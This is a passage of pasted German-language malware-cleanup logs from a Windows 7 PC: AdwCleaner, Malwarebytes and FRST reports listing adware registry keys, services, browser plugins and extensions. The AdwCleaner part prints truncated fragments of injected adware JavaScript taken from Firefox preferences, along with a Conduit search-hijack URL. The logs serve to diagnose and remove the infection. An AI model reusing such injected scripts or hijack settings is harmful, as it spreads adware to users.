[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{49C00A51-6E59-41FE-B3FA-2D2157FAD67B}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{6DFF5DBA-AE3A-46DB-B301-ECFFC6DB2982}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{DE34CD67-F1C8-4001-9A23-B8A68F63F377}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{88C20E16-1EB7-40CE-820C-6CFCB41B1D2F}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{41634761-D0BA-4C1A-9AC2-04AEE9511370}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{93DBF2BB-A2B3-4683-A92E-57E60751F346}
[-] Schlüssel Gelöscht : HKCU\Software\1ClickDownload
[-] Schlüssel Gelöscht : HKCU\Software\Boost
[-] Schlüssel Gelöscht : HKCU\Software\ClickConnect
[-] Schlüssel Gelöscht : HKCU\Software\Conduit
[-] Schlüssel Gelöscht : HKCU\Software\GlobalUpdate
[-] Schlüssel Gelöscht : HKCU\Software\InstallCore
[-] Schlüssel Gelöscht : HKCU\Software\OCS
[-] Schlüssel Gelöscht : HKCU\Software\SearchProtectINT
[-] Schlüssel Gelöscht : HKCU\Software\SweetIM
[-] Schlüssel Gelöscht : HKCU\Software\UpdaterEX
[-] Schlüssel Gelöscht : HKCU\Software\Reimage
[-] Schlüssel Gelöscht : HKCU\Software\onekit
[-] Schlüssel Gelöscht : HKCU\Software\Super Optimizer
[-] Schlüssel Gelöscht : HKCU\Software\Binkiland Browser
[-] Schlüssel Gelöscht : HKCU\Software\Appscion
[-] Schlüssel Gelöscht : HKCU\Software\System Optimizer
[-] Schlüssel Gelöscht : HKCU\Software\YorkNewCin
[-] Schlüssel Gelöscht : HKCU\Software\HighDefAction
[-] Schlüssel Gelöscht : HKCU\Software\ArenaHD
[-] Schlüssel Gelöscht : HKCU\Software\PRODUCTSETUP
[-] Schlüssel Gelöscht : HKCU\Software\OB
[-] Schlüssel Gelöscht : HKCU\Software\undefined
[-] Schlüssel Gelöscht : HKCU\Software\Crossbrowse
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Crossrider
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Savings Bull
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\AppDataLow\SOFTWARE\Crossrider
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\AppDataLow\SOFTWARE\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Boost
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Conduit
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\GlobalUpdate
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SavingsBullFilter
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\supWPM
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SweetIM
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\sweet-pageSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Tutorials
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Uniblue
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Taronja
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\YorkNewCin
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\HighDefAction
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\WebProtector
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\ArenaHD
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Crossbrowse
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F6423EE4-93D8-FA04-D09D-A8598F6EFDFD}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Iminent
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\LevelQualityWatcher
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Reimage
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\WebBar
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\YorkNewCin
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\HighDefAction
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\ArenaHD
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3152E1F19977892449DC968802CE8964
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLOBALUPDATE.EXE
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0b4d26f6-61a8-4463-99dd-5f2fe0400fa6}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
[-] Daten Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0} [NameServer]

***** [ Internetbrowser ] *****

[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.I27nhBqrnTmK9ZBi.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.OrM348BI7ONz6x3I.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"secure.dditserv[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.QZ2PfaZcGfDrlj43.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"secure.dditserv[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.THC6eL302GRxEmrT.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"livewebcams.xyz\",\"search.asistent[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.ZgIRlvn8PSaHQSKH.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.crossrider.bic", "14d819805d0db272fdbdb086ef894caa");
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.hdpQ86YFIHYbEFBP.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\prefs.js] [Preference] Gelöscht : user_pref("extensions.k0biZPvjPSaodpcg.scode", "(function(){try{if(window.location.href.indexOf(\"qHgHrHs5pdw4rHr9qda9qTk4rY\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\"[...]
[-] [C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Gelöscht : kfecnpmgnlnbmipaogfhoacoioifjgko

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Chrome Richtlinien gelöscht

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [37794 Bytes] ##########

--- --- ---

Inhalt von MBAM.txt

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan, 22.12.2015 00:16, SYSTEM, EASYNOTE, Manual, Start: 21.12.2015 23:26, Dauer: 41 Min. 22 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 1001 Nicht-Malware-Erkennungen,
Error, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, IsLicensed, 13,
Protection, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, Malware Protection, Stopping,
Protection, 22.12.2015 00:22, SYSTEM, EASYNOTE, Protection, Malware Protection, Stopped,

(end)

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:20-12-2015
durchgeführt von Özkan (Administrator) auf EASYNOTE (22-12-2015 01:23:03)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_WT50RP.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-27] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2821936 2012-03-07] (ELAN Microelectronics Corp.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {1c281590-2b6f-11e3-b71b-b888e3cf1a37} - E:\LGAutoRun.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6b7e0915-f87b-11e2-9524-806e6f6e6963} - D:\AutoRun\AutoRunX\AutoRunX.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6dccb73b-6b4e-11e3-accd-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {720267d0-76b1-11e3-8f9d-b888e3cf1a37} - F:\SETUP.EXE
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {81dd1ca2-40b4-11e4-893b-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {85a61aa3-6a20-11e3-a24a-b888e3cf1a37} - E:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ACHTUNG
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\avsinit.vbs [2014-12-15] ()
CHR HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.100.212 80.69.100.205
Tcpip\..\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0}: [DhcpNameServer] 80.69.100.212 80.69.100.205

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKLM-x32 -> Standard = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = 
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> URL hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652
FF Homepage: google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-09] ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-10-12] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-10-12] (Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1203133.dll [2013-06-26] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @ngm.nexoneu.com/NxGame -> C:\ProgramData\NexonEU\NGM\npNxGameEU.dll [2015-08-04] (Nexon)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\Özkan\Documents\my games\PB\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1539430812-113463742-2149372525-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Özkan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Extension: Adblock Plus Pop-up Addon - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\extensions\adblockpopups@jessehakanen.net.xpi [2015-12-08]
FF Extension: Adblock Plus - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-12-15]
FF HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\m4d0ej0b.default\extensions\cliqz@cliqz.com => nicht gefunden

Chrome: 
=======
CHR Profile: C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-08]
CHR Extension: (Google Docs) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-08]
CHR Extension: (Google Drive) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-08]
CHR Extension: (YouTube) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-08]
CHR Extension: (Adblock Plus) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-12-08]
CHR Extension: (Google-Suche) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-08]
CHR Extension: (Google Tabellen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-08]
CHR Extension: (Google Mail) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [448384 2014-08-15] ()
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-08] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 Sony PC Companion; C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe [155824 2013-02-04] (Avanquest Software) [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5491984 2015-05-20] (TeamViewer GmbH)
S3 ACTION_SVC; C:\Program Files (x86)\Mirillis\Action!\action_svc.exe [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Mobizen plugin; C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe [X]
